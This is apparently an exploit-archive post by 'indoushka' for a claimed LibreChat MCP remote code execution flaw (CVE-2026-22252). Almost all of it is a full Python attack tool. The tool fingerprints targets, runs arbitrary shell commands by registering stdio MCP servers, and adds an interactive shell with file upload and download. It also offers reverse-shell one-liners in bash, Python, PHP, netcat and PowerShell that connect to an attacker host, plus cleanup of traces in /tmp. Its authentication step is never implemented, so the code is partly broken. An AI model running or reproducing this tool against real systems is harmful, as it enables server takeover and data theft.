============================================================================================================================================= | # Title : LibreChat MCP 0.8.2-rc2 RCE Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.librechat.ai/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252 [+] Summary : exploit targets the LibreChat MCP Remote Code Execution vulnerability (CVE-2026-22252). It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple extraction modes. [+] Key Features: Target Discovery: Detects LibreChat installations, extracts version, OS type, shell, CSRF status, and public writable paths. MCP Interaction: Checks MCP endpoint availability, determines required permissions, and supports command execution with optional token-based authentication. Command Execution: Executes system commands safely using multiple extraction modes: direct, file, network, or base64 encoded. Vulnerability Testing: Performs safe and thorough tests with verification of results. Interactive Shell: Provides a CLI interface with command history, status display, file upload/download, reverse shell creation, and rate limiting. Cross-Platform Support: Works on Linux, macOS, and Windows with adaptive shell commands. Logging & Debugging: Detailed logs saved locally and on-screen, with verbose mode for troubleshooting. [+] POC : #!/usr/bin/env python3 import requests import json import sys import re import time import argparse import signal import os import random import string from typing import Optional, Dict, Any, Tuple, List from dataclasses import dataclass from enum import Enum import logging from urllib.parse import urljoin, urlparse from pathlib import Path import hashlib logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', handlers=[ logging.StreamHandler(), logging.FileHandler('librechat_exploit.log') ] ) logger = logging.getLogger(__name__) class TransportType(Enum): """Supported transport types""" STDIO = "stdio" SSE = "sse" HTTP = "http" class ExploitMode(Enum): """Output extraction methods""" DIRECT = "direct" FILE = "file" NETWORK = "network" ENCODED = "encoded" @dataclass class AuthResult: """Authentication result""" success: bool token: Optional[str] = None cookies: Optional[Dict] = None session_id: Optional[str] = None csrf_token: Optional[str] = None user_role: str = "user" permissions: List[str] = None message: str = "" @dataclass class TargetInfo: """Target system information""" is_librechat: bool = False version: Optional[str] = None csrf_enabled: bool = False mcp_available: bool = False mcp_requires_admin: bool = False public_paths: List[str] = None os_type: str = "linux" shell_type: str = "sh" class LibreChatExploit: def __init__(self, target_url: str, timeout: int = 30): self.target_url = target_url.rstrip('/') self.timeout = timeout self.target_info = TargetInfo() self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', }) self.auth_result = AuthResult(success=False, permissions=[]) self.csrf_token = None def _extract_csrf_token(self, response_text: str) -> Optional[str]: """Extract CSRF token from HTML or JSON""" patterns = [ r'name="csrfToken" value="([^"]+)"', r'"csrfToken":"([^"]+)"', r'window\.csrfToken = "([^"]+)"', r' str: """Generate random string""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def _detect_public_paths(self) -> List[str]: """Detect available public paths""" common_public_paths = [ '/images/', '/public/', '/static/', '/assets/', '/uploads/', '/media/', '/files/', '/downloads/', ] available_paths = [] for path in common_public_paths: try: response = self.session.get( urljoin(self.target_url, path), timeout=5, allow_redirects=False ) if response.status_code in [200, 301, 302, 403]: available_paths.append(path) logger.debug(f"Found public path: {path}") except Exception as e: logger.debug(f"Path check {path} failed: {e}") continue return available_paths def _detect_os_and_shell(self) -> Tuple[str, str]: """Detect operating system and shell type""" os_type = "linux" shell_type = "sh" return os_type, shell_type def check_target(self) -> Tuple[bool, str]: """Comprehensive target check""" try: response = self.session.get( self.target_url, timeout=self.timeout ) if response.status_code != 200: return False, f"Server unavailable (HTTP {response.status_code})" html_content = response.text librechat_indicators = [ 'LibreChat', 'librechat', 'Evo', 'next/head', 'authToken', 'conversationId', ] is_librechat = any(indicator.lower() in html_content.lower() for indicator in librechat_indicators) if not is_librechat: return False, "This may not be a LibreChat server" self.target_info.is_librechat = True version_patterns = [ r'"version":"([^"]+)"', r'librechat-([\d\.]+)', r'v(\d+\.\d+\.\d+)', r'Version\s+([\d\.]+)', ] for pattern in version_patterns: match = re.search(pattern, html_content, re.IGNORECASE) if match: self.target_info.version = match.group(1) break self.csrf_token = self._extract_csrf_token(html_content) if self.csrf_token: self.session.headers.update({'X-CSRF-Token': self.csrf_token}) self.target_info.csrf_enabled = True self.target_info.public_paths = self._detect_public_paths() self.target_info.os_type, self.target_info.shell_type = self._detect_os_and_shell() return True, f"LibreChat {self.target_info.version if self.target_info.version else 'unknown'}" except requests.RequestException as e: return False, f"Connection error: {e}" except Exception as e: logger.error(f"Unexpected error in target check: {e}") return False, f"Check error: {e}" def _get_user_permissions(self) -> List[str]: """Get user permissions""" permissions = [] check_endpoints = [ ('/api/admin', 'admin_access'), ('/api/mcp/servers', 'mcp_access'), ('/api/users', 'user_management'), ('/api/settings', 'settings_access'), ] for endpoint, perm_name in check_endpoints: try: url = urljoin(self.target_url, endpoint) response = self.session.get(url, timeout=10) if response.status_code == 200: permissions.append(perm_name) elif response.status_code == 403: permissions.append(f"{perm_name}_denied") elif response.status_code == 404: pass except Exception as e: logger.debug(f"Permission check {perm_name} failed: {e}") return permissions def check_mcp_endpoint(self) -> Tuple[bool, str]: """Check MCP endpoint and permissions""" mcp_url = urljoin(self.target_url, '/api/mcp/servers') try: response = self.session.get(mcp_url, timeout=self.timeout) if response.status_code == 401: logger.debug("MCP requires authentication") elif response.status_code == 403: self.target_info.mcp_requires_admin = True return False, "Requires admin privileges" elif response.status_code == 404: alt_paths = ['/api/v1/mcp/servers', '/api/v2/mcp/servers', '/mcp/api/servers'] for path in alt_paths: alt_url = urljoin(self.target_url, path) try: alt_response = self.session.get(alt_url, timeout=5) if alt_response.status_code < 400: mcp_url = alt_url break except: continue if self.auth_result.success: headers = {} if self.auth_result.token: headers['Authorization'] = f"Bearer {self.auth_result.token}" response = self.session.get(mcp_url, headers=headers, timeout=self.timeout) if response.status_code == 200: self.target_info.mcp_available = True try: test_payload = { "config": { "type": "stdio", "title": "permission_test", "command": "echo", "args": ["test"] } } test_response = self.session.post( mcp_url, json=test_payload, headers=headers, timeout=self.timeout ) if test_response.status_code in [200, 201]: return True, "Available for read/write" elif test_response.status_code == 403: self.target_info.mcp_requires_admin = True return False, "Requires admin privileges for write" else: return True, f"Read only (POST: {test_response.status_code})" except Exception as e: logger.debug(f"MCP permission test failed: {e}") return True, "Available (write test failed)" elif response.status_code == 403: self.target_info.mcp_requires_admin = True return False, "Forbidden - requires higher privileges" elif response.status_code == 404: return False, "Endpoint not found" return False, f"Unknown status: {response.status_code}" except Exception as e: logger.error(f"MCP check error: {e}") return False, f"Connection error: {e}" def execute_command(self, command: str, exfil_mode: ExploitMode = ExploitMode.DIRECT) -> Tuple[bool, str, Optional[str]]: """Execute command with multiple output extraction options""" if not self.auth_result.success: return False, "Unauthorized", None final_command = self._prepare_command(command, exfil_mode) mcp_url = urljoin(self.target_url, '/api/mcp/servers') headers = { "Content-Type": "application/json", } if self.auth_result.token: headers['Authorization'] = f"Bearer {self.auth_result.token}" if self.csrf_token: headers['X-CSRF-Token'] = self.csrf_token payload = { "config": { "type": "stdio", "title": f"cmd_{self._generate_random_string()}", "command": self._get_shell_path(), "args": ["-c", final_command] } } try: logger.info(f"Sending command via MCP...") response = self.session.post( mcp_url, json=payload, headers=headers, timeout=self.timeout ) if response.status_code in [200, 201]: output = self._retrieve_output(command, exfil_mode) return True, "Command executed successfully", output else: error_msg = f"Execution failed: {response.status_code}" if response.text: error_msg += f" - {response.text[:200]}" return False, error_msg, None except requests.Timeout: return False, "Timeout - command may still be executing", None except Exception as e: logger.error(f"Execution error: {e}") return False, f"Error: {e}", None def _prepare_command(self, command: str, exfil_mode: ExploitMode) -> str: """Prepare command based on extraction method""" random_suffix = self._generate_random_string() if exfil_mode == ExploitMode.DIRECT: return f"({command}) 2>&1" elif exfil_mode == ExploitMode.FILE: temp_file = f"/tmp/cmd_out_{random_suffix}.txt" return f"({command}) 2>&1 > {temp_file} && echo 'OUTPUT_SAVED:{temp_file}'" elif exfil_mode == ExploitMode.NETWORK: return f"({command}) 2>&1 | base64" elif exfil_mode == ExploitMode.ENCODED: return f"echo 'START_OUTPUT' && ({command}) 2>&1 | base64 -w0 && echo 'END_OUTPUT'" return f"({command}) 2>&1" def _get_shell_path(self) -> str: """Get appropriate shell path""" if self.target_info.os_type == "windows": return "cmd.exe" elif self.target_info.shell_type == "bash": return "/bin/bash" else: return "/bin/sh" def _retrieve_output(self, original_command: str, exfil_mode: ExploitMode) -> Optional[str]: """Retrieve command output""" output = None try: if exfil_mode == ExploitMode.DIRECT: pass elif exfil_mode == ExploitMode.FILE: find_cmd = f"find /tmp -name '*cmd_out_*.txt' -mmin -1 2>/dev/null | head -5" success, files_output = self._execute_simple_command(find_cmd) if success and files_output: for line in files_output.split('\n'): if line.strip(): read_cmd = f"cat {line.strip()} 2>/dev/null && rm -f {line.strip()}" success, content = self._execute_simple_command(read_cmd) if success: output = content break elif exfil_mode == ExploitMode.ENCODED: log_cmds = [ "dmesg | tail -20 2>/dev/null", "journalctl --no-pager -n 20 2>/dev/null", "cat /var/log/syslog 2>/dev/null | tail -20", ] for log_cmd in log_cmds: success, log_output = self._execute_simple_command(log_cmd) if success and "START_OUTPUT" in log_output: start = log_output.find("START_OUTPUT") + len("START_OUTPUT") end = log_output.find("END_OUTPUT") if end > start: encoded = log_output[start:end].strip() try: import base64 output = base64.b64decode(encoded).decode('utf-8', errors='ignore') except: output = encoded break except Exception as e: logger.debug(f"Output retrieval failed: {e}") return output def _execute_simple_command(self, command: str) -> Tuple[bool, str]: """Execute simple command (for extraction)""" try: success, msg, output = self.execute_command( command, exfil_mode=ExploitMode.ENCODED ) return success, output if output else "" except: return False, "" def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]: """Test vulnerability accurately and safely""" test_id = self._generate_random_string(12) test_file = f"/tmp/librechat_test_{test_id}.txt" test_command = f""" echo "=== TEST START {test_id} ===" && id && echo "---" && whoami && echo "---" && pwd && echo "---" && uname -a && echo "=== TEST END {test_id} ===" """ logger.info(f"Testing vulnerability (ID: {test_id})...") for exfil_mode in [ExploitMode.ENCODED, ExploitMode.FILE, ExploitMode.DIRECT]: logger.debug(f"Trying method: {exfil_mode.value}") success, message, output = self.execute_command(test_command, exfil_mode) if success: logger.info(f"[ok] Execution successful with {exfil_mode.value}") if output: if test_id in output: logger.info(f"[ok] Results verified") return True, f"Vulnerability exists and exploitable (method: {exfil_mode.value})", output else: logger.debug("Results don't contain expected identifier") return True, f"Vulnerability exists (execution successful)", output time.sleep(1) file_test_command = f"echo 'VULN_TEST_{test_id}' > {test_file}" check_command = f"cat {test_file} 2>/dev/null && rm -f {test_file}" success1, msg1, _ = self.execute_command(file_test_command, ExploitMode.DIRECT) time.sleep(1) success2, msg2, output = self.execute_command(check_command, ExploitMode.ENCODED) if success1 and success2 and output and f"VULN_TEST_{test_id}" in output: return True, "Vulnerability exists (file test successful)", output return False, "Vulnerability not found or not exploitable", None class InteractiveExploitShell: """Enhanced interactive interface""" def __init__(self, exploit: LibreChatExploit): self.exploit = exploit self.running = True self.command_history = [] self.session_id = hashlib.md5(str(time.time()).encode()).hexdigest()[:8] signal.signal(signal.SIGINT, self._signal_handler) signal.signal(signal.SIGTERM, self._signal_handler) self.rate_limit = 1.0 self.last_command_time = 0 self.output_mode = ExploitMode.ENCODED def _signal_handler(self, signum, frame): """Handle system signals""" logger.info(f"\n[!] Received signal {signum} - safe termination...") self.running = False def _check_rate_limit(self): """Check rate limiting""" current_time = time.time() time_since_last = current_time - self.last_command_time if time_since_last < self.rate_limit: sleep_time = self.rate_limit - time_since_last logger.debug(f"Rate limiting: wait {sleep_time:.2f} seconds") time.sleep(sleep_time) def _cleanup_temp_files(self): """Clean up temporary files if possible""" cleanup_cmd = "find /tmp -name '*librechat_*' -mmin +5 -delete 2>/dev/null" self.exploit.execute_command(cleanup_cmd, ExploitMode.DIRECT) def run(self): """Run interactive interface""" print(f"\n{'='*60}") print(f"LibreChat MCP RCE - Session: {self.session_id}") print(f"Target: {self.exploit.target_url}") print(f"User: {self.exploit.auth_result.user_role}") print(f"{'='*60}") print("Type 'help' for full menu") while self.running: try: self._check_rate_limit() prompt = f"\nexploit[{self.session_id}]> " try: cmd = input(prompt).strip() except (EOFError, KeyboardInterrupt): print("\n[*] Ending session...") break if not cmd: continue self.last_command_time = time.time() self.command_history.append(cmd) if len(self.command_history) > 50: self.command_history.pop(0) if self._handle_special_commands(cmd): continue self._execute_user_command(cmd) except Exception as e: logger.error(f"Interactive interface error: {e}") time.sleep(0.5) self._cleanup_temp_files() print(f"\n[*] Ending session {self.session_id}") def _handle_special_commands(self, cmd: str) -> bool: """Handle special commands""" cmd_lower = cmd.lower().strip() if cmd_lower == 'exit' or cmd_lower == 'quit': self.running = False return True elif cmd_lower == 'help': self._show_help() return True elif cmd_lower == 'history': self._show_history() return True elif cmd_lower == 'status': self._show_status() return True elif cmd_lower == 'mode': self._change_output_mode() return True elif cmd_lower == 'clear': os.system('clear' if os.name != 'nt' else 'cls') return True elif cmd_lower.startswith('shell '): self._handle_reverse_shell(cmd) return True elif cmd_lower.startswith('upload '): self._handle_file_upload(cmd) return True elif cmd_lower.startswith('download '): self._handle_file_download(cmd) return True return False def _show_help(self): """Show help menu""" help_text = """ ╔══════════════════════════════════════════════════════════╗ ║ LibreChat RCE Commands by indoushka ║ ╚══════════════════════════════════════════════════════════╝ Basic Commands: help Show this menu exit / quit Exit session status Show system status history Show command history clear Clear screen mode Change output display method Advanced Commands: shell [LHOST] [LPORT] Create reverse shell upload [local] [remote] Upload file download [remote] [local] Download file System Exploration: pwd Current directory ls [path] List files cat [file] Show file content Information Gathering: id User information whoami Username uname -a System info ps aux Running processes Note: Use ';' to separate multiple commands """ print(help_text) def _show_history(self): """Show command history""" if not self.command_history: print("[*] No commands in history") return print("\nCommand History (newest first):") print("-" * 50) for i, cmd in enumerate(reversed(self.command_history[-10:]), 1): print(f"{i:2d}. {cmd[:60]}{'...' if len(cmd) > 60 else ''}") print("-" * 50) def _show_status(self): """Show system status""" print(f"\n{'='*50}") print("System Status:") print(f"{'='*50}") print(f"Target: {self.exploit.target_url}") print(f"Version: {self.exploit.target_info.version or 'unknown'}") print(f"User: {self.exploit.auth_result.user_role}") print(f"OS: {self.exploit.target_info.os_type}") print(f"Shell: {self.exploit.target_info.shell_type}") print(f"CSRF: {'enabled' if self.exploit.target_info.csrf_enabled else 'disabled'}") print(f"MCP: {'available' if self.exploit.target_info.mcp_available else 'unavailable'}") print(f"Requires admin: {'yes' if self.exploit.target_info.mcp_requires_admin else 'no'}") print(f"Output method: {self.output_mode.value}") print(f"{'='*50}") def _change_output_mode(self): """Change output display method""" modes = list(ExploitMode) print("\nAvailable output methods:") for i, mode in enumerate(modes, 1): print(f" {i}. {mode.value}") try: choice = input("\nChoose number [1-4]: ").strip() if choice.isdigit() and 1 <= int(choice) <= len(modes): self.output_mode = modes[int(choice) - 1] print(f"[ok] Changed to: {self.output_mode.value}") else: print("[!] Invalid choice") except: print("[!] Choice error") def _handle_reverse_shell(self, cmd: str): """Handle reverse shell command""" parts = cmd.split() if len(parts) < 3: print("[!] Usage: shell [LHOST] [LPORT]") return lhost = parts[1] lport = parts[2] if not lport.isdigit(): print("[!] Port must be a number") return print(f"\n[*] Preparing reverse shell to {lhost}:{lport}") print("[*] Make sure listener is running:") print(f" nc -lvnp {lport}") print("\n[*] Attempting...") shells = [] if self.exploit.target_info.os_type == "linux": shells = [ f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'", f"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'", f"php -r '$s=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", f"nc -e /bin/sh {lhost} {lport}", ] elif self.exploit.target_info.os_type == "windows": shells = [ f"powershell -c \"$c=New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()}};$c.Close()\"", ] for i, shell_cmd in enumerate(shells, 1): print(f"\n[*] Trying shell #{i}...") success, message, _ = self.exploit.execute_command(shell_cmd, self.output_mode) if success: print(f"[ok] Shell sent successfully") print("[*] Wait 5 seconds for connection...") time.sleep(5) break else: print(f"[no] Failed: {message}") def _handle_file_upload(self, cmd: str): """Upload file to server""" parts = cmd.split() if len(parts) < 3: print("[!] Usage: upload [local file] [remote path]") return local_file = parts[1] remote_path = parts[2] if not os.path.exists(local_file): print(f"[!] Local file not found: {local_file}") return try: with open(local_file, 'rb') as f: content = f.read() import base64 encoded_content = base64.b64encode(content).decode('utf-8') upload_cmd = f""" echo '{encoded_content}' | base64 -d > "{remote_path}" && echo "UPLOAD_SUCCESS: {remote_path}" || echo "UPLOAD_FAILED" """ print(f"[*] Uploading {local_file} to {remote_path}...") success, message, output = self.exploit.execute_command(upload_cmd, self.output_mode) if success and output and "UPLOAD_SUCCESS" in output: print(f"[ok] File uploaded successfully") else: print(f"[no] Upload failed: {message}") except Exception as e: print(f"[no] Upload error: {e}") def _handle_file_download(self, cmd: str): """Download file from server""" parts = cmd.split() if len(parts) < 3: print("[!] Usage: download [remote path] [local file]") return remote_path = parts[1] local_file = parts[2] download_cmd = f""" if [ -f "{remote_path}" ]; then cat "{remote_path}" | base64 -w0; echo ""; else echo "FILE_NOT_FOUND"; fi """ print(f"[*] Downloading {remote_path} to {local_file}...") success, message, output = self.exploit.execute_command(download_cmd, ExploitMode.ENCODED) if success and output and output.strip() and "FILE_NOT_FOUND" not in output: try: import base64 content = base64.b64decode(output.strip()) with open(local_file, 'wb') as f: f.write(content) print(f"[ok] Downloaded successfully ({len(content)} bytes)") except Exception as e: print(f"[no] Decryption error: {e}") else: print(f"[no] Download failed: {message}") def _execute_user_command(self, cmd: str): """Execute user command""" print(f"[*] Executing...") start_time = time.time() success, message, output = self.exploit.execute_command(cmd, self.output_mode) elapsed = time.time() - start_time if success: print(f"[ok] Executed ({elapsed:.2f} seconds)") if output and output.strip(): print(f"\n{'='*50}") print("Output:") print(f"{'='*50}") print(output[:5000]) if len(output) > 5000: print(f"\n[...] Output truncated ({len(output)} chars)") print(f"{'='*50}") else: print(f"[no] Failed: {message}") def main(): parser = argparse.ArgumentParser( description='LibreChat MCP RCE Exploit - Final Version', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: %(prog)s -u http://localhost:3080 --check %(prog)s -u http://target.com --test %(prog)s -u http://target.com -c "id" %(prog)s -u http://target.com --interactive Warning: For legal and ethical use only. Written authorization required before testing any system. """ ) parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://localhost:3080)') parser.add_argument('-c', '--command', help='Command to execute') parser.add_argument('-f', '--command-file', help='File containing commands to execute') parser.add_argument('--test', action='store_true', help='Test vulnerability only') parser.add_argument('--check', action='store_true', help='Check system only') parser.add_argument('--interactive', action='store_true', help='Interactive mode') parser.add_argument('--username', default='test_user', help='Username (default: test_user)') parser.add_argument('--password', default='Test12345!', help='Password (default: Test12345!)') parser.add_argument('--email', default='test@example.local', help='Email (default: test@example.local)') parser.add_argument('--timeout', type=int, default=30, help='Timeout in seconds (default: 30)') parser.add_argument('--verbose', '-v', action='store_true', help='Show detailed information') parser.add_argument('--output-mode', choices=['direct', 'file', 'encoded'], default='encoded', help='Output extraction method') args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) print("="*60) print("LibreChat MCP RCE Exploit by indoushka") print("CVE-2026-22252") print("="*60) try: exploit = LibreChatExploit(args.url, args.timeout) print("[*] Checking target system...") target_ok, target_msg = exploit.check_target() if not target_ok: print(f"[no] {target_msg}") sys.exit(1) print(f"[ok] {target_msg}") print(f"\n[*] System Information:") print(f" - Version: {exploit.target_info.version or 'unknown'}") print(f" - OS: {exploit.target_info.os_type}") print(f" - Shell: {exploit.target_info.shell_type}") print(f" - CSRF: {'enabled' if exploit.target_info.csrf_enabled else 'disabled'}") if exploit.target_info.public_paths: print(f" - Public paths: {', '.join(exploit.target_info.public_paths)}") print("\n[*] Checking MCP endpoint...") mcp_ok, mcp_msg = exploit.check_mcp_endpoint() print(f"[*] MCP: {mcp_msg}") if not mcp_ok and "requires authentication" not in mcp_msg: print(f"[!] Warning: {mcp_msg}") if not args.interactive: sys.exit(1) if args.check: sys.exit(0) if args.test: print("\n[*] Testing vulnerability...") vulnerable, vuln_msg, output = exploit.test_vulnerability() if vulnerable: print(f"[ok] {vuln_msg}") if output: print(f"\n[+] Sample output:\n{output[:500]}") else: print(f"[no] {vuln_msg}") sys.exit(0) if args.command: output_mode = ExploitMode(args.output_mode) print(f"\n[*] Executing command: {args.command}") success, message, output = exploit.execute_command(args.command, output_mode) if success: print(f"[ok] {message}") if output: print(f"\n[+] Output:\n{output}") else: print(f"[no] {message}") elif args.interactive: shell = InteractiveExploitShell(exploit) shell.run() else: print("\n[!] No action specified. Use --help for help") except KeyboardInterrupt: print("\n\n[*] Interrupted by user") sys.exit(0) except Exception as e: logger.error(f"Unexpected error: {e}") sys.exit(1) if __name__ == "__main__": main() Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================